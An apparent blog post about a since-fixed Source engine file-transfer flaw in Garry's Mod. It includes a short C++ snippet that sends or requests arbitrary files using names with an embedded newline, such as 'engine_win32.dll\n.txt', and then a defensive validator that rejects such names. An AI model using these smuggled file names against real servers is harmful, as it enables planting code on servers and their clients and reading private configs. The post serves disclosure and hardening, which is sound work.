engine_win32.dll

There’s been a fair bit of drama today over an exploit in Garry’s Mod which allowed a DLL to be uploaded and run on servers, which would in turn run it on all clients connected to the server.

Basically, the exploit boils down to a flaw in internal Source engine networking code that does not properly sanitize file names.

CreateInterfaceFn engineFactory = Sys_GetFactory("engine.dll");
IVEngineClient* client = static_cast<IVEngineClient*>(engineFactory(VENGINE_CLIENT_INTERFACE_VERSION, NULL));

INetChannel* info = static_cast<INetChannel*>(client->GetNetChannelInfo());

// Send any file
info->SendFile("engine_win32.dll\n.txt");

// Receive any file
info->RequestFile("cfg/server.cfg\n.txt");

It’s fixed now though, so no need to worry!
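
The file names in the snippet above hide the real name in front of an embedded newline followed by `.txt`. The following is an added example, not code from the Source engine or from the original post, that contrasts an extension-only check with a validator that rejects such names before looking at the extension. The function names, the allowlist and the assumption that the vulnerable check only looked at the trailing extension are hypothetical.

```cpp
#include <cctype>
#include <cstddef>
#include <iostream>
#include <string>

// Assumed shape of the weak check: only the text after the last '.' is inspected,
// so "engine_win32.dll\n.txt" is treated as a harmless .txt file.
bool naive_is_allowed(const std::string& name) {
    std::size_t dot = name.rfind('.');
    return dot != std::string::npos && name.substr(dot) == ".txt";
}

// Hypothetical hardened validator for file names received over the network.
bool is_safe_transfer_name(const std::string& name) {
    static const char* const kAllowedExt[] = {".txt", ".bsp", ".wav"};  // constructed allowlist
    if (name.empty() || name.size() > 255 || name[0] == '/') return false;
    for (unsigned char c : name) {
        if (c < 0x20 || c == 0x7f) return false;   // control bytes: \n, \r, NUL, ...
        if (c == '\\' || c == ':') return false;   // Windows separators and drive prefixes
    }
    // Every '/'-separated component must be a real name: no "", "." or "..".
    for (std::size_t start = 0; start <= name.size();) {
        std::size_t end = name.find('/', start);
        if (end == std::string::npos) end = name.size();
        std::string part = name.substr(start, end - start);
        if (part.empty() || part == "." || part == "..") return false;
        start = end + 1;
    }
    // Only after the name is known to be clean is the extension compared.
    std::size_t dot = name.rfind('.');
    if (dot == std::string::npos) return false;
    std::string ext = name.substr(dot);
    for (char& ch : ext) ch = static_cast<char>(std::tolower(static_cast<unsigned char>(ch)));
    for (const char* allowed : kAllowedExt)
        if (ext == allowed) return true;
    return false;
}

int main() {
    // The two names from the post plus one benign name (constructed).
    const char* samples[] = {"engine_win32.dll\n.txt", "cfg/server.cfg\n.txt", "maps/readme.txt"};
    for (const char* s : samples)
        std::cout << "naive=" << naive_is_allowed(s)
                  << " hardened=" << is_safe_transfer_name(s) << '\n';
    return 0;
}
```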